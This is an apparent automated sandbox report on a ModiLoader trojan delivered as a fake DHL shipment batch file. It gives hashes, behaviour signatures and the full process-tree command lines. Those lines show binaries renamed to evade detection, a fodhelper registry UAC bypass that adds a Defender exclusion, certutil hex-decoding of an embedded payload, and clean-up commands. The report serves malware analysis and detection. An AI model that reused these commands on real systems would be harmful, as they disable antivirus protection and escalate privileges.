modiloader | 2e0c4709969f98b16b7f1f90039cf045defe6d541610d1beaf868a4a058a1e3b

General

Target

DHL Shipment 3338186294.bat
Size

2.5MB
MD5

c7dd17110928b64f19c2b8449d23a876
SHA1

9f190c670b55bcafc5aadca0f4da1c7c87780766
SHA256

2e0c4709969f98b16b7f1f90039cf045defe6d541610d1beaf868a4a058a1e3b
SHA512

5c8364df0e5f0c479aa21c70f27f2a02ba25858dd5858cd773321cf4c24bf89c9d3f2517df718afe706ed6302dd32415c0aa4015c633c6098c2b4371c1edaf81
SSDEEP

24576:yaaMHj/9yg91lBGZJ5rsL9jAMDpRZObauo31nXCn+RCN1DVkY5:zfD4g9wZJ589jnDpRZN65

Score

10^/10

modiloader trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2004-54-0x0000000002C40000-0x0000000003C40000-memory.dmp	modiloader_stage2

Executes dropped EXE 16 IoCs

Processes:

alpha.exealpha.exealpha.exexkn.exealpha.exealpha.exekn.exealpha.exekn.exeLewxa.comalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
2956	alpha.exe
2620	alpha.exe
864	alpha.exe
2408	xkn.exe
2204	alpha.exe
2276	alpha.exe
2860	kn.exe
3056	alpha.exe
324	kn.exe
2004	Lewxa.com
532	alpha.exe
568	alpha.exe
1104	alpha.exe
1508	alpha.exe
604	alpha.exe
2756	alpha.exe

Loads dropped DLL 9 IoCs

Processes:

cmd.exealpha.exexkn.exealpha.exeWerFault.exe

pid process

2672 cmd.exe
2672 cmd.exe
2672 cmd.exe
864 alpha.exe
2408 xkn.exe
2408 xkn.exe
2276 alpha.exe
1388 WerFault.exe
1388 WerFault.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1388 2004 WerFault.exe Lewxa.com
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1500 taskkill.exe
2772 taskkill.exe

pid	process
2672	cmd.exe
2672	cmd.exe
2672	cmd.exe
864	alpha.exe
2408	xkn.exe
2408	xkn.exe
2276	alpha.exe
1388	WerFault.exe
1388	WerFault.exe

pid	pid_target	process	target process
1388	2004	WerFault.exe	Lewxa.com

pid	process
1500	taskkill.exe
2772	taskkill.exe

Modifies registry class 5 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\ms-settings\shell	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2412 reg.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Lewxa.com

pid process

2004 Lewxa.com
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

xkn.exe

pid process

2408 xkn.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

xkn.exetaskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2408 xkn.exe
Token: SeDebugPrivilege 1500 taskkill.exe
Token: SeDebugPrivilege 2772 taskkill.exe

pid	process
2412	reg.exe

pid	process
2004	Lewxa.com

pid	process
2408	xkn.exe

description	pid	process
Token: SeDebugPrivilege	2408	xkn.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	2772	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 2672 wrote to memory of 2616	2672	cmd.exe	cmd.exe
PID 2672 wrote to memory of 2616	2672	cmd.exe	cmd.exe
PID 2672 wrote to memory of 2616	2672	cmd.exe	cmd.exe
PID 2616 wrote to memory of 2944	2616	cmd.exe	extrac32.exe
PID 2616 wrote to memory of 2944	2616	cmd.exe	extrac32.exe
PID 2616 wrote to memory of 2944	2616	cmd.exe	extrac32.exe
PID 2672 wrote to memory of 2956	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 2956	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 2956	2672	cmd.exe	alpha.exe
PID 2956 wrote to memory of 2600	2956	alpha.exe	extrac32.exe
PID 2956 wrote to memory of 2600	2956	alpha.exe	extrac32.exe
PID 2956 wrote to memory of 2600	2956	alpha.exe	extrac32.exe
PID 2672 wrote to memory of 2620	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 2620	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 2620	2672	cmd.exe	alpha.exe
PID 2620 wrote to memory of 2556	2620	alpha.exe	extrac32.exe
PID 2620 wrote to memory of 2556	2620	alpha.exe	extrac32.exe
PID 2620 wrote to memory of 2556	2620	alpha.exe	extrac32.exe
PID 2672 wrote to memory of 864	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 864	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 864	2672	cmd.exe	alpha.exe
PID 864 wrote to memory of 2408	864	alpha.exe	xkn.exe
PID 864 wrote to memory of 2408	864	alpha.exe	xkn.exe
PID 864 wrote to memory of 2408	864	alpha.exe	xkn.exe
PID 2408 wrote to memory of 2204	2408	xkn.exe	alpha.exe
PID 2408 wrote to memory of 2204	2408	xkn.exe	alpha.exe
PID 2408 wrote to memory of 2204	2408	xkn.exe	alpha.exe
PID 2204 wrote to memory of 2412	2204	alpha.exe	reg.exe
PID 2204 wrote to memory of 2412	2204	alpha.exe	reg.exe
PID 2204 wrote to memory of 2412	2204	alpha.exe	reg.exe
PID 2672 wrote to memory of 2276	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 2276	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 2276	2672	cmd.exe	alpha.exe
PID 2276 wrote to memory of 2860	2276	alpha.exe	kn.exe
PID 2276 wrote to memory of 2860	2276	alpha.exe	kn.exe
PID 2276 wrote to memory of 2860	2276	alpha.exe	kn.exe
PID 2672 wrote to memory of 3056	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 3056	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 3056	2672	cmd.exe	alpha.exe
PID 3056 wrote to memory of 324	3056	alpha.exe	kn.exe
PID 3056 wrote to memory of 324	3056	alpha.exe	kn.exe
PID 3056 wrote to memory of 324	3056	alpha.exe	kn.exe
PID 2672 wrote to memory of 2004	2672	cmd.exe	Lewxa.com
PID 2672 wrote to memory of 2004	2672	cmd.exe	Lewxa.com
PID 2672 wrote to memory of 2004	2672	cmd.exe	Lewxa.com
PID 2672 wrote to memory of 2004	2672	cmd.exe	Lewxa.com
PID 2672 wrote to memory of 532	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 532	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 532	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 568	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 568	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 568	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 1104	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 1104	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 1104	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 1508	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 1508	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 1508	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 604	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 604	2672	cmd.exe	alpha.exe
PID 2672 wrote to memory of 604	2672	cmd.exe	alpha.exe
PID 604 wrote to memory of 1500	604	alpha.exe	taskkill.exe
PID 604 wrote to memory of 1500	604	alpha.exe	taskkill.exe
PID 604 wrote to memory of 1500	604	alpha.exe	taskkill.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL Shipment 3338186294.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2672

C:\Windows\system32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2616

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
3⤵
PID:2944

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2956

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
3⤵
PID:2600

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2620

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2556

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:864

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
5⤵
- Modifies registry class
- Modifies registry key
PID:2412

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DHL Shipment 3338186294.bat" "C:\\Users\\Public\\Lewxa.txt" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2276

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DHL Shipment 3338186294.bat" "C:\\Users\\Public\\Lewxa.txt" 9
3⤵
- Executes dropped EXE
PID:2860

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3056

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
3⤵
- Executes dropped EXE
PID:324

C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 712
3⤵
- Loads dropped DLL
- Program crash
PID:1388

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:532

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:568

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1104

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:1508

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:604

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
2⤵
- Executes dropped EXE
PID:2756

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Lewxa.txt

Filesize
1.8MB

MD5
7b56c9570846bba65b31628c8cd53117

SHA1
fa5b315c81257e3716e8923e7df0f865ae7f02f3

SHA256
09c6cad0cc68492c31d4004be8b6a7a84d2a0fcee9cfc8d562f6aed4fef14644

SHA512
a2e813332a32e68f2928269f2ca07c0856975a5be7aeda11247d4fde51d6422b3efa3df5003c5e73e98fa0bae5a941f1a07561590a3d05f7c744a188bf51b3fd

Download Submit
C:\Users\Public\Libraries\Lewxa.com

Filesize
917KB

MD5
2fcbc98b3cba297ba8e87ae27d84ba9e

SHA1
9e81fe9c902a00f941789d72e060f78ecf9b3218

SHA256
8552d0af99ef6eec00d73395898a450f780711fab91efd491ce76e20b82d4fed

SHA512
80024c337a14da6a17b1fd68957f1500df69f372c9bb61dbcb5328bb65491aa7f8b5eae32b281b4e316b683a25827ef994ad27bb368fd3e463166c33b536e53f

Download Submit
C:\Users\Public\alpha.exe

Filesize
21KB

MD5
e197cb947d3519099939f05e281c3420

SHA1
f404e21d9cb676f971eca04a0ec7a2854b40ae57

SHA256
7033eab30dd992fdd8fb9865bb04fc22c638da6bd8aba05541fd771588a9d27f

SHA512
4c6f96b1debcf783785c66e1c213c5a9970285f456dcb90d65e336dd66e70b18beca724badf121d4b0ad4548449dfd45f1b3a102ab67e8cc89617239dbe06607

Download Submit
C:\Users\Public\xkn.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Public\alpha.exe

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\kn.exe

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
memory/2004-58-0x0000000000400000-0x00000000004EE000-memory.dmp

Filesize
952KB

Download
memory/2004-57-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2004-54-0x0000000002C40000-0x0000000003C40000-memory.dmp

Filesize
16.0MB

Download
memory/2004-53-0x0000000002C40000-0x0000000003C40000-memory.dmp

Filesize
16.0MB

Download
memory/2004-46-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2408-23-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp

Filesize
9.6MB

Download
memory/2408-32-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp

Filesize
9.6MB

Download
memory/2408-27-0x0000000001EA0000-0x0000000001F20000-memory.dmp

Filesize
512KB

Download
memory/2408-26-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp

Filesize
9.6MB

Download
memory/2408-25-0x0000000001EA0000-0x0000000001F20000-memory.dmp

Filesize
512KB

Download
memory/2408-24-0x0000000001EA0000-0x0000000001F20000-memory.dmp

Filesize
512KB

Download
memory/2408-22-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2408-21-0x000000001B090000-0x000000001B372000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads